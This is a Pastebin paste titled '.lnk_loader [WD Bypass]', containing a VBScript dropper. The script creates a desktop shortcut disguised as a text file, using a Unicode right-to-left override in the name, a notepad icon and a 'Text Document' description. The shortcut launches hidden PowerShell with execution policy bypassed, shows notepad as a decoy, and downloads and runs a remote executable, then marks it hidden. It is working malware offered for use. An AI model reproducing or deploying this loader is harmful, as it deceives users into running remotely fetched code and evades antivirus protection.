betrayed

.lnk_loader [WD Bypass]

Dec 3rd, 2020
726
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. 'credit https://github.com/xillwillx/tricky.lnk
  2. 'edited NYAN CAT
  3.  
  4. Dim DownLoadLink, FileName
  5. DownLoadLink = "'https://the.earth.li/~sgtatham/putty/latest/w32/putty.exe'"
  6. FileName = "'putty.exe'"
  7.  
  8. Set WshShell = CreateObject("WScript.Shell")
  9. Set ShApp = CreateObject("Shell.Application")
  10. DesktopPath = ShApp.Namespace(0).Self.Path
  11. unicode = Unescape("%u0052%u0065%u0061%u0064%u004d%u0065%u005f%u202e%u0074%u0078%u0074%u002e%u006c%u006e%u006b")
  12. unicodeName = "unicode.lnk"
  13. shortcutPath = DesktopPath & "\" & unicodeName
  14. Set lnk = WshShell.CreateShortcut(shortcutPath)
  15. lnk.TargetPath = "powershell.exe"
  16. lnk.Arguments =  "-ExecutionPolicy Bypass -WindowStyle Hidden -Command notepad.exe;(new-object System.Net.WebClient).DownloadFile(" & DownLoadLink & "," & FileName & ");./" & Filename & ";(get-item " & Filename & ").Attributes += 'Hidden';"
  17. lnk.IconLocation = "c:\windows\system32\notepad.exe"
  18. lnk.Description = "Type: Text Document"
  19. lnk.Save()
  20. Set FSO = CreateObject("Scripting.FileSystemObject")
  21. Set file = FSO.GetFile(shortcutPath)
  22. file.name = unicode & ".lnk"
RAW Paste Data